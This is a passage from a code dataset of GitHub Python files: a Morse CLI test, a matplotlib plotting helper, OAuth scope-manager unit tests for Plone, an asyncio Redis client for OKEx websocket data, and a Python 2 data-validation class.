-.-.\"], \"ABC\"),\n (\n [\"--encode\", \"ABC DE\", \"--dot\", \"+\", \"--dash\", \"=\", \"--separator\", \"_\", \"--space\", \"&\"],\n \"+=_=+++_=+=+_&_=++_+\"\n ),\n (\n [\"--decode\", \"+=_=+++_=+=+_&_=++_+\", \"--dot\", \"+\", \"--dash\", \"=\", \"--separator\", \"_\", \"--space\", \"&\"],\n \"ABC DE\"\n ),\n ])\n def test_process_args(self, input_args, expected):\n args = self.parser.parse_args(input_args)\n output = process_args(args)\n self.assertEqual(expected, output)\n\n def test_process_args_exception(self):\n with self.assertRaises(ValueError):\n args = self.parser.parse_args([\"ABC\"])\n process_args(args)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"vladhaidukkk/morse-translator","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19218515456","text":"import matplotlib.pyplot as plt\n\n#Questa funzione crea un grafico comparando le accuratezze su trainset e test seti di un dataset\ndef create_plot(name, percentages, accuracy_train, accuracy_validation, pruning):\n plt.plot(percentages, accuracy_train)\n plt.plot(percentages, accuracy_validation)\n if pruning == 0:\n plt.title(\"Curve di apprendimento \" + str(name) + \" SENZA pruning\")\n elif pruning == 1:\n plt.title(\"Curve di apprendimento \" + str(name) + \" CON pruning\")\n plt.xlabel(\"Percentuali apprendimento dataset\")\n plt.ylabel(\"Accuratezza su test set\")\n plt.legend(['Accuratezza training set', 'Accuratezza test set'])\n plt.show()\n\n#Questa funzione crea un grafico che compare due curve sul test set\ndef plot_comparation(name, percentages, frist_cruve, second_curve):\n plt.plot(percentages, frist_cruve)\n plt.plot(percentages, second_curve)\n plt.title(\"Confronto curve di apprendimento test set di:\" + str(name) )\n plt.xlabel(\"Percentuali apprendimento dataset\")\n plt.ylabel(\"Accuratezza su test set\")\n plt.legend(['Accuratezza senza pruning', 'Accuratezza con pruning'])\n plt.show()","repo_name":"iacopoerpichini/AI-Project","sub_path":"Codice/grafico.py","file_name":"grafico.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32554281920","text":"from time import time\nimport unittest\n\nfrom zope.interface import Interface\nimport zope.component\nfrom zope.schema.interfaces import WrongType, WrongContainedType\n\nfrom zExceptions import Forbidden\nfrom zExceptions import BadRequest\n\nfrom Products.PloneTestCase import ptc\n\nfrom pmr2.oauth.interfaces import KeyExistsError\nfrom pmr2.oauth.interfaces import IDefaultScopeManager\nfrom pmr2.oauth.scope import BTreeScopeManager, ContentTypeScopeManager\nfrom pmr2.oauth.scope import ContentTypeScopeProfile\n\nfrom pmr2.oauth.tests import base\n\n\nclass BTreeScopeManagerTestCase(unittest.TestCase):\n \"\"\"\n Test the storage and retrieval of client and access key specific\n scopes.\n \"\"\"\n\n def setUp(self):\n self.sm = BTreeScopeManager()\n self.client = 'client_key'\n self.access = 'access_key'\n\n def test_0000_base(self):\n self.assertRaises(KeyError, self.sm.delClientScope, self.client)\n self.assertRaises(KeyError, self.sm.delAccessScope, self.access)\n\n self.assertRaises(KeyError, self.sm.getClientScope, self.client)\n self.assertRaises(KeyError, self.sm.getAccessScope, self.access)\n\n self.assertTrue(\n self.sm.getClientScope(self.client, default=None) is 
None)\n self.assertTrue(\n self.sm.getAccessScope(self.access, default=None) is None)\n\n def test_0010_set_get(self):\n scope1 = 'http://example.com/scope.1'\n scope2 = 'http://example.com/scope.2'\n\n self.sm.setClientScope(self.client, scope1)\n self.assertEqual(self.sm.getClientScope(self.client), scope1)\n\n self.sm.setAccessScope(self.access, scope2)\n self.assertEqual(self.sm.getAccessScope(self.access), scope2)\n\n def test_0011_set_duplicate(self):\n scope1 = 'http://example.com/scope.1'\n scope2 = 'http://example.com/scope.2'\n\n self.sm.setClientScope(self.client, scope1)\n self.assertRaises(KeyExistsError, \n self.sm.setClientScope, self.client, scope1)\n\n self.sm.setAccessScope(self.access, scope2)\n self.assertRaises(KeyExistsError, \n self.sm.setAccessScope, self.access, scope2)\n\n def test_0020_del(self):\n scope1 = 'http://example.com/scope.1'\n scope2 = 'http://example.com/scope.2'\n\n self.sm.setClientScope(self.client, scope1)\n self.sm.delClientScope(self.client)\n # Can \"hide\" exception using optional parameter like get/set.\n self.sm.delClientScope(self.client, None)\n self.sm.setClientScope(self.client, scope2)\n self.assertEqual(self.sm.getClientScope(self.client), scope2)\n\n self.sm.setAccessScope(self.access, scope1)\n # This may be considered dangerous as this does not tie into the\n # access token in any way. Subclasses may need to handle this\n # to ensure the content owner is aware of scope changes.\n self.sm.delAccessScope(self.access)\n\n # New scope is updated.\n self.sm.setAccessScope(self.access, scope2)\n self.assertEqual(self.sm.getAccessScope(self.access), scope2)\n\n\nclass CTSMMappingTestCase(unittest.TestCase):\n \"\"\"\n Testing the profile and management within this scope manager.\n \"\"\"\n\n def setUp(self):\n self.sm = ContentTypeScopeManager()\n self.file_mapping = {'File': ['document_view']}\n self.folder_mapping = {'Folder': ['folder_contents']}\n\n def test_0100_get_mapping(self):\n self.assertRaises(KeyError, self.sm.getMapping, 1)\n self.assertEqual(self.sm.getMapping(1, default='test'), 'test')\n\n def test_0101_add_get_mapping(self):\n self.assertEqual(self.sm.addMapping('test'), 1)\n self.assertEqual(self.sm.getMapping(1), 'test')\n\n def test_0200_mapping_name_and_id(self):\n _marker = 2\n self.assertRaises(KeyError, self.sm.getMappingId, 'rawscope')\n self.sm.setMappingNameToId('rawscope', _marker)\n self.assertEqual(self.sm.getMappingId('rawscope'), _marker)\n self.sm.setMappingNameToId('rawscope', 3)\n self.assertEqual(self.sm.getMappingId('rawscope'), 3)\n self.sm.delMappingName('rawscope')\n self.assertRaises(KeyError, self.sm.getMappingId, 'rawscope')\n\n def test_1000_request_scope_fresh_fail(self):\n self.assertFalse(self.sm.requestScope('key', 'rawscope'))\n self.assertEqual(len(self.sm._scope), 0)\n\n def test_1001_request_scope_fresh_default(self):\n self.assertTrue(self.sm.requestScope('key', None))\n self.assertEqual(len(self.sm._scope), 1)\n # Can't set this again.\n self.assertRaises(KeyError, self.sm.requestScope, 'key', None)\n\n def test_1002_request_scope_set_singular(self):\n key = 'request_key'\n scope = 'test_scope'\n mapping_id = self.sm.addMapping(self.file_mapping)\n self.sm.setMappingNameToId(scope, mapping_id)\n self.assertTrue(self.sm.requestScope(key, scope))\n self.assertEqual(len(self.sm._scope), 1)\n mappings = self.sm.getScope(key)\n self.assertEqual(len(mappings), 1)\n self.assertTrue(mapping_id in mappings)\n # Obviously not an access scope.\n self.assertRaises(KeyError, self.sm.getAccessScope, 
key)\n # Nor a client scope.\n self.assertRaises(KeyError, self.sm.getClientScope, key)\n\n def test_1003_request_scope_multiple(self):\n file_id = self.sm.addMapping(self.file_mapping)\n folder_id = self.sm.addMapping(self.folder_mapping)\n self.sm.setMappingNameToId('file', file_id)\n self.sm.setMappingNameToId('folder', folder_id)\n\n key1 = 'request_key1'\n key2 = 'request_key2'\n raw_scope = 'test_scope'\n self.assertFalse(self.sm.requestScope(key1, 'test_scope'))\n # all of them must be valid.\n self.assertFalse(self.sm.requestScope(key1, \n 'http://nohost/plone/scope/file,test_scope'))\n self.assertTrue(self.sm.requestScope(key1, \n 'http://nohost/plone/scope/file,http://nohost/plone/scope/folder'))\n\n mappings = self.sm.getScope(key1)\n self.assertEqual(len(mappings), 2)\n self.assertTrue(file_id in mappings)\n self.assertTrue(folder_id in mappings)\n\n self.assertTrue(self.sm.requestScope(key2, \n 'http://nohost/plone/scope/folder'))\n mappings = self.sm.getScope(key2)\n self.assertEqual(len(mappings), 1)\n self.assertTrue(file_id not in mappings)\n\n\nclass CTSMEditingTestCase(unittest.TestCase):\n \"\"\"\n Testing the profile and management within this scope manager.\n \"\"\"\n\n def setUp(self):\n self.sm = ContentTypeScopeManager()\n self.file_profile = ContentTypeScopeProfile()\n self.file_profile.mapping = {'File': ['document_view']}\n self.folder_profile = ContentTypeScopeProfile()\n self.folder_profile.mapping = {'Folder': ['folder_contents']}\n\n def test_0001_edit(self):\n self.sm.setEditProfile('file', None)\n self.assertRaises(AssertionError, \n self.sm.setEditProfile, 'file', object())\n\n self.sm.setEditProfile('file', self.file_profile)\n self.assertEqual(self.sm.getEditProfile('file'), self.file_profile)\n\n def test_0002_commit_del(self):\n self.sm.setEditProfile('file', self.file_profile)\n self.sm.commitEditProfile('file')\n self.assertEqual(self.sm.getMappingByName('file'),\n self.file_profile.mapping)\n mapping_id = self.sm.getMappingId('file')\n self.assertEqual(self.sm.getMappingMethods(mapping_id),\n ['GET', 'HEAD', 'OPTIONS'])\n\n self.sm.delMappingName('file')\n self.assertEqual(self.sm.getEditProfile('file'), None)\n self.assertEqual(self.sm.getMappingByName('file', default=None), None)\n\n\nclass CTSMPloneIntegrationTestCase(ptc.PloneTestCase):\n \"\"\"\n Testing the validation on just the objects with the provided \n mapping and other Plone integration.\n \"\"\"\n\n def afterSetUp(self):\n self.sm = ContentTypeScopeManager()\n self.mapping = {}\n\n def assertScopeValid(self, accessed, name):\n self.assertTrue(self.sm.validateTargetWithMapping(\n accessed, name, self.mapping))\n\n def assertScopeInvalid(self, accessed, name):\n self.assertFalse(self.sm.validateTargetWithMapping(\n accessed, name, self.mapping))\n\n def test_0000_resolve_target(self):\n obj, path = self.sm.resolveTarget(self.folder, 'folder_contents')\n self.assertEqual(obj, 'Folder')\n self.assertEqual(path, 'folder_contents')\n\n def test_0001_resolve_subtarget(self):\n folder_add = self.folder.restrictedTraverse('+')\n obj, path = self.sm.resolveTarget(folder_add, 'addFolder')\n self.assertEqual(obj, 'Folder')\n self.assertEqual(path, '+/addFolder')\n\n def test_0002_resolve_nothing(self):\n obj, path = self.sm.resolveTarget(object(), 'addFolder')\n self.assertEqual(obj, None)\n self.assertEqual(path, None)\n\n def test_0100_root_scope(self):\n self.mapping = {\n 'Plone Site': ['folder_contents'],\n }\n self.assertScopeValid(self.portal, 'folder_contents')\n 
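# 'manage' is not listed under 'Plone Site' in the mapping above,\n # so validation of that view name is expected to fail.\n 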
self.assertScopeInvalid(self.portal, 'manage')\n\n def test_0101_folder_scope(self):\n self.mapping = {\n 'Folder': ['folder_contents'],\n }\n self.assertScopeValid(self.folder, 'folder_contents')\n\n def test_0201_browser_view(self):\n self.mapping = {\n 'Folder': ['+/addFile', 'folder_contents'],\n }\n # Adding views.\n folder_add = self.folder.restrictedTraverse('+')\n self.assertScopeValid(folder_add, 'addFile')\n self.assertScopeInvalid(folder_add, 'addFolder')\n self.assertScopeInvalid(self.folder, 'addFile')\n\n # For whatever reason this happened, but still forbidden by\n # scope restrictions.\n portal_add = self.portal.unrestrictedTraverse('+')\n self.assertScopeInvalid(portal_add, 'addFile')\n\n def test_0301_asterisk_ending(self):\n self.mapping = {\n 'Folder': ['folder*contents', 'test_*'],\n 'Plone Site': ['test/test_*', 'test/view*me', 'example/*'],\n }\n\n self.assertScopeInvalid(self.folder, 'folder_contents')\n self.assertScopeInvalid(self.folder, 'test_view')\n self.assertScopeInvalid(self.folder, 'test_')\n\n self.assertScopeInvalid(self.portal, 'test_')\n self.assertScopeInvalid(self.portal, 'test/test')\n self.assertScopeInvalid(self.portal, 'test/view_me')\n self.assertScopeValid(self.portal, 'test/test_')\n self.assertScopeValid(self.portal, 'test/test_view')\n self.assertScopeValid(self.portal, 'test/test_page')\n\n # invalid for now\n self.assertScopeInvalid(self.portal, 'example')\n self.assertScopeValid(self.portal, 'example/')\n self.assertScopeValid(self.portal, 'example/a')\n\n\nclass CTSMValidateTestCase(ptc.PloneTestCase):\n \"\"\"\n Testing the validation process.\n \"\"\"\n\n def afterSetUp(self):\n self.sm = ContentTypeScopeManager()\n self.file_mapping = {'File': ['document_view']}\n self.folder_mapping = {'Folder': ['folder_contents', '+/addFile']}\n file_id = self.sm.addMapping(self.file_mapping)\n folder_id = self.sm.addMapping(self.folder_mapping)\n self.sm.setMappingNameToId('file', file_id)\n self.sm.setMappingNameToId('folder', folder_id)\n self.folder_add = self.folder.restrictedTraverse('+')\n\n self.all_ids = set([file_id, folder_id])\n\n def test_0100_request_to_access(self):\n rkey = 'request_key'\n akey = 'access_key'\n self.assertTrue(self.sm.requestScope(rkey, \n 'http://nohost/plone/scope/file,http://nohost/plone/scope/folder'))\n\n self.sm.setAccessScope(akey, self.sm.getScope(rkey))\n self.assertEqual(self.sm.getAccessScope(akey), self.all_ids)\n # Should there be something to automatically revoke it?\n # Probably?\n\n request = base.TestRequest()\n\n self.assertFalse(self.sm.validate(request, '', akey, self.folder,\n self.portal, 'document_view', object()))\n self.assertTrue(self.sm.validate(request, '', akey, self.folder,\n self.portal, 'folder_contents', object()))\n\n self.assertFalse(self.sm.validate(request, '', akey, self.folder_add,\n self.portal, 'addFolder', object()))\n self.assertTrue(self.sm.validate(request, '', akey, self.folder_add,\n self.portal, 'addFile', object()))\n\n # TODO test cases where mappings have been purged but the\n # token references to them were not.\n\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(BTreeScopeManagerTestCase))\n suite.addTest(makeSuite(CTSMMappingTestCase))\n suite.addTest(makeSuite(CTSMEditingTestCase))\n suite.addTest(makeSuite(CTSMPloneIntegrationTestCase))\n suite.addTest(makeSuite(CTSMValidateTestCase))\n return 
suite\n","repo_name":"PMR2/pmr2.oauth","sub_path":"pmr2/oauth/tests/test_scope.py","file_name":"test_scope.py","file_ext":"py","file_size_in_byte":13001,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"1475662888","text":"# 给最终用户的接口, 从 redis 取 okex websockets 的数据\nimport asyncio\nimport json\nimport logging\nfrom typing import Union\n\nimport aioredis\n\nfrom okws.interceptor import execute\nfrom okws.ws2redis.candle import config as candle\nfrom okws.ws2redis.normal import config as normal\nfrom .settings import default_settings\n\nlogger = logging.getLogger(__name__)\n\n\nclass Client:\n async def get(self, name, path, params=None):\n if params is None:\n params = {}\n ctx = {\n 'id': self.id,\n 'name': name,\n 'path': path,\n 'redis': self.redis\n }\n ctx.update(params)\n await execute(ctx, self.interceptors)\n return ctx.get('response')\n\n async def close(self):\n if self.redis is not None:\n self.redis.close()\n await self.redis.wait_closed()\n self.redis = None\n\n def __init__(self, REDIS_URL, REDIS_INFO_KEY, LISTEN_CHANNEL, **argv):\n # 注意初始化要执行 init()\n self.redis_url = REDIS_URL\n self.redis = None\n self.interceptors = [normal['read'], candle['read']]\n self.id = id(self)\n self.redis_path = f\"{REDIS_INFO_KEY}/{self.id}\"\n self.listen_channel = LISTEN_CHANNEL\n\n async def init(self):\n self.redis = await aioredis.create_redis(self.redis_url)\n\n async def send(self, cmd: dict):\n # send cmd to websocket\n # if 'name' not in cmd:\n # logger.warning(f\"未指定 websocket 服务名! {cmd}\")\n cmd['id'] = self.id\n await self.redis.publish_json(self.listen_channel, cmd)\n\n async def open_ws(self, name, auth_params=None):\n if auth_params is None:\n auth_params = {}\n await self.send({\n 'op': 'open',\n 'name': name,\n 'args': auth_params\n })\n # await self.redis.publish_json(LISTEN_CHANNEL)\n await asyncio.sleep(1)\n ret = await self.redis.get(self.redis_path, encoding='utf-8')\n return json.loads(ret)\n\n async def subscribe(self, name, channels: Union[list, str]):\n await self.send({\n 'op': 'subscribe',\n 'name': name,\n 'args': channels if type(channels) == list else [channels]\n })\n await asyncio.sleep(0)\n ret = await self.redis.get(self.redis_path, encoding='utf-8')\n return json.loads(ret)\n\n async def close_ws(self, name):\n await self.send({\n 'op': 'close',\n 'name': name\n })\n await asyncio.sleep(1)\n ret = await self.redis.get(self.redis_path, encoding='utf-8')\n return json.loads(ret)\n\n async def server_quit(self):\n await self.send({\n 'op': 'quit_server'\n })\n await asyncio.sleep(1)\n ret = await self.redis.get(self.redis_path, encoding='utf-8')\n return json.loads(ret)\n\n async def servers(self):\n await self.send({\n 'op': 'servers'\n })\n await asyncio.sleep(1)\n ret = await self.redis.get(self.redis_path, encoding='utf-8')\n return json.loads(ret)\n\n async def redis_clear(self, path=\"okex/*\"):\n # 清除 redis 服务器中的相关数据\n keys = await self.redis.keys(path)\n for key in keys:\n await self.redis.delete(key)\n\n def __del__(self):\n logger.debug('退出')\n if self.redis is not None:\n self.redis.close()\n\n\nasync def client(configs=None) -> Client:\n # 使用些函数初始化 OKEX 类\n if configs is None:\n configs = {}\n configs.update(default_settings)\n okex = Client(**configs)\n await okex.init()\n return 
okex\n","repo_name":"oscnet/okws","sub_path":"okws/aioclient.py","file_name":"aioclient.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"6580411331","text":"__author__ = \"Timothy Tickle\"\n__copyright__ = \"Copyright 2012\"\n__credits__ = [\"Timothy Tickle\"]\n__license__ = \"MIT\"\n__maintainer__ = \"Timothy Tickle\"\n__email__ = \"ttickle@sph.harvard.edu\"\n__status__ = \"Development\"\n\n#Import local code\nfrom types import *\nimport decimal\nimport os\nimport re\nimport string\n\nclass ValidateData:\n\n #Tested 5\n @staticmethod\n def funcIsValidBoolean(parameterValue):\n \"\"\"\n Validates a parameter as a valid boolean.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid boolean.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if parameterValue == None:\n return False\n\n #Check to make sure it is a string\n if not type(parameterValue) is BooleanType:\n return False\n return True\n\n #Tested 6\n @staticmethod\n def funcIsTrue(parameterValue):\n \"\"\"\n Validates a parameter as true.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is True.\n :type\tBoolean\n \"\"\"\n\n if(ValidateData.funcIsValidBoolean(parameterValue)):\n if(parameterValue == True):\n return True\n return False\n\n #Tested 6\n @staticmethod\n def funcIsFalse(parameterValue):\n \"\"\"\n Validates a parameter as false.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is False.\n :type\tBoolean\n \"\"\"\n\n if(ValidateData.funcIsValidBoolean(parameterValue)):\n if(parameterValue == False):\n return True\n return False\n\n #Tested 5\n @staticmethod\n def funcIsValidInteger(parameterValue):\n \"\"\"\n Validates a parameter as an integer.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is an integer.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if (parameterValue == None):\n return False\n\n #Check to make sure it is an integer\n if not type(parameterValue) is IntType:\n return False\n\n return True\n\n #Tested 5\n @staticmethod\n def funcIsValidPositiveInteger(parameterValue, tempZero = False):\n \"\"\"\n Validates a parameter as false.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :param\ttempZero:\tAllows one to set what the value for zero should return.\n :type\tBoolean\tThe return value for zero.\n :return\tBoolean:\tTrue indicates the parameter is a positive integer.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if not ValidateData.funcIsValidInteger(parameterValue):\n return False\n\n #Check to see it is positive\n if (parameterValue < 0):\n return False\n\n #Check for zero value\n if(parameterValue == 0):\n return tempZero\n return True\n\n #Tested 14\n @staticmethod\n def funcIsValidNumeric(parameterValue):\n \"\"\"\n Validates a parameter as an integer.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a numeric.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if (parameterValue == None):\n return False\n #Check to make sure it is an integer\n if((type(parameterValue) == IntType)or(type(parameterValue) == LongType)or(type(parameterValue) == 
FloatType)or(type(parameterValue) == ComplexType)or(str(type(parameterValue)) == \"\")):\n if(not type(parameterValue) == BooleanType):\n return True\n return False\n\n #Tested 5\n @staticmethod\n def funcIsValidStringType(parameterValue):\n \"\"\"\n Validates a parameter as a string. This allows the string to be blank or empty.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a string type.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if parameterValue == None:\n return False\n\n #Check to make sure it is a string\n if not type(parameterValue) is StringType:\n return False\n\n return True\n\n #Tested 5\n @staticmethod\n def funcIsValidString(parameterValue):\n \"\"\"\n Validates a parameter as a string. Does NOT allow string to be blank or empty.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a string.\n :type\tBoolean\n \"\"\"\n\n #Type check\n if not ValidateData.funcIsValidStringType(parameterValue):\n return False\n\n #Check to see it is not blank\n if parameterValue.strip() == \"\":\n return False\n return True\n\n @staticmethod\n def funcIsValidStringInt(parameterValue):\n \"\"\"\n Validates a parameter that is a string as a format which is an integer.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n \"\"\"\n\n #Type string check\n if not ValidateData.funcIsValidStringType(parameterValue):\n return False\n\n #Check to see if the string can be converted to an integer\n try:\n int(parameterValue)\n except:\n return False\n return True\n\n @staticmethod\n def funcIsValidStringFloat(parameterValue):\n \"\"\"\n Validates a parameter that is a string as a format which is a numeric.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n \"\"\"\n\n #Type string check\n if not ValidateData.funcIsValidStringType(parameterValue):\n return False\n\n #Check to see if the string can be converted to a double\n try:\n float(parameterValue)\n except:\n return False\n return True\n\n #Tested 6\n @staticmethod\n def funcIsValidFormatString(parameterValue):\n \"\"\"\n Validates a parameter as a valid format string.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n lettersValid = False\n if ValidateData.funcIsValidString(parameterValue):\n validChars = \"BbcdfHhIiLlPpsx0123456789\"\n for letter in parameterValue:\n lettersValid = letter in validChars\n if(not lettersValid):\n break\n return lettersValid\n\n #Tested 5\n @staticmethod\n def funcIsValidChar(parameterValue):\n \"\"\"\n Validates a parameter as a valid character.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n return ValidateData.funcIsValidString(parameterValue)\n\n #Tested 13\n @staticmethod\n def funcIsValidPositiveNumberChar(parameterValue):\n \"\"\"\n Validates a parameter as a valid character representing a number.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure is a valid string\n if not ValidateData.funcIsValidString(parameterValue):\n return False\n\n #Try to convert to decimal\n try:\n decimalConversion = decimal.Decimal(parameterValue)\n if decimalConversion 
< 0:\n return False\n except:\n return False\n return True\n\n #Tested 9\n @staticmethod\n def funcIsValidFlagChar(parameterValue):\n \"\"\"\n Validates a parameter as a valid character representing a boolean.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n if parameterValue == '0' or parameterValue == \"0\" or parameterValue == '1' or parameterValue == \"1\":\n return True\n return False\n\n #Tested 15\n @staticmethod\n def funcIsValidBoundedIntegerChar(parameterValue, iValueOne, iValueTwo):\n \"\"\"\n Validates a parameter as a valid characater that represents an integer inclusively bounded by two given values.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :param\tiValueOne:\tOne bound for the value.\n :type\tInteger\n :param\tiValueTwo:\tThe other bound for the data.\n :type\tInteger\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure is a valid string\n if not ValidateData.funcIsValidString(parameterValue):\n return False\n\n #Check to make sure is a valid integer\n if not ValidateData.funcIsValidInteger(iValueOne):\n return False\n\n #Check to make sure is a valid integer\n if not ValidateData.funcIsValidInteger(iValueTwo):\n return False\n\n #Try to convert to decimal\n try:\n intConversion = int(parameterValue)\n if(iValueOne < iValueTwo):\n if ((intConversion >= iValueOne) and (intConversion <= iValueTwo)):\n return True\n return False\n if(iValueTwo < iValueOne):\n if ((intConversion >= iValueTwo) and (intConversion <= iValueOne)):\n return True\n return False\n if(iValueOne == iValueTwo):\n if (intConversion == iValueOne):\n return True\n return False\n except:\n return False\n\n #Tested 9\n @staticmethod\n def funcIsValidList(parameterValue):\n \"\"\"\n Validates a parameter as a list.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a list\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if parameterValue == None:\n return False\n\n #Check to make sure it is a list\n if not type(parameterValue) is ListType:\n return False\n\n #Check elements\n listSize = len(parameterValue)\n for i in range(0,listSize):\n if parameterValue[i] == None:\n return False\n if type(parameterValue[i]) is ListType:\n if ValidateData.funcIsValidList(parameterValue[i]) == False:\n return False\n return True\n\n #Tested 9\n @staticmethod\n def funcIsValidTuple(parameterValue):\n \"\"\"\n Validates a parameter as a tuple.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a tuple\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if parameterValue == None:\n return False\n\n #Check to make sure it is a string\n if not type(parameterValue) is TupleType:\n return False\n\n #Check elements\n tupleSize = len(parameterValue)\n for i in range(0,tupleSize):\n if parameterValue[i] == None:\n return False\n if type(parameterValue[i]) is TupleType:\n if ValidateData.funcIsValidTuple(parameterValue[i]) == False:\n return False\n return True\n\n #Tested 7\n @staticmethod\n def funcIsValidNumericList(parameterValue):\n \"\"\"\n Validates a parameter as a list of numeric values.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a list of numeric values.\n 
:type\tBoolean\n \"\"\"\n\n #Check is valid list\n if(not ValidateData.funcIsValidList(parameterValue)):\n return False\n\n #Check elements\n listSize = len(parameterValue)\n for i in range(0,listSize):\n if(not ValidateData.funcIsValidNumeric(parameterValue[i])):\n return False\n return True\n\n #Tested 7\n @staticmethod\n def funcIsValidStringList(parameterValue):\n \"\"\"\n Validates a parameter as a list of string values.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a list of string values.\n :type\tBoolean\n \"\"\"\n\n #Check is valid list\n if(not ValidateData.funcIsValidList(parameterValue)):\n return False\n\n #Check elements\n listSize = len(parameterValue)\n for i in range(0,listSize):\n if(not ValidateData.funcIsValidString(parameterValue[i])):\n return False\n return True\n\n #Tested 4\n @staticmethod\n def funcIsValidNPArray(parameterValue):\n \"\"\"\n Validates a parameter as a numpy array.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a numpy array.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if parameterValue == None:\n return False\n\n #Check to make sure it is a structure array\n if not str(type(parameterValue)) == \"<type 'numpy.ndarray'>\":\n return False\n\n return True\n\n #Tested 9\n @staticmethod\n def funcIsValidDictionary(parameterValue):\n \"\"\"\n Validates a parameter as a dictionary.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a dictionary.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if parameterValue == None:\n return False\n\n #Check to make sure it is a dictionary\n if not type(parameterValue) is DictType:\n return False\n\n #Check key elements\n keyList = list(parameterValue.keys())\n keyListSize = len(keyList)\n for i in range(0,keyListSize):\n if keyList[i] == None:\n return False\n if type(keyList[i]) is ListType:\n if ValidateData.funcIsValidList(keyList[i]) == False:\n return False\n\n #Check value elements\n itemList = list(parameterValue.values())\n itemListSize = len(itemList)\n\n for i in range(0,itemListSize):\n if itemList[i] == None:\n return False\n if type(itemList[i]) is ListType:\n if ValidateData.funcIsValidList(itemList[i]) == False:\n return False\n return True\n\n #Tested 18\n @staticmethod\n def funcIsValidDNASequence(parameterValue):\n \"\"\"\n Validates a parameter as a valid DNA sequence.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n if ValidateData.funcIsValidString(parameterValue):\n expression = re.compile(r'[^atcgATCG]')\n if not None == expression.search(parameterValue):\n return False\n return True\n return False\n\n #Tested 15\n @staticmethod\n def funcIsValidNucleotideBase(parameterValue):\n \"\"\"\n Validates a parameter as a character which is a valid nucleotide representation.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n if (ValidateData.funcIsValidDNASequence(parameterValue) or (parameterValue == 'u') or (parameterValue == \"U\")):\n if (len(parameterValue) == 1):\n return True\n return False\n\n #Testing 4\n @staticmethod\n def funcIsValidFileName(parameterValue):\n \"\"\"\n Validates a parameter as a valid file name.\n\n 
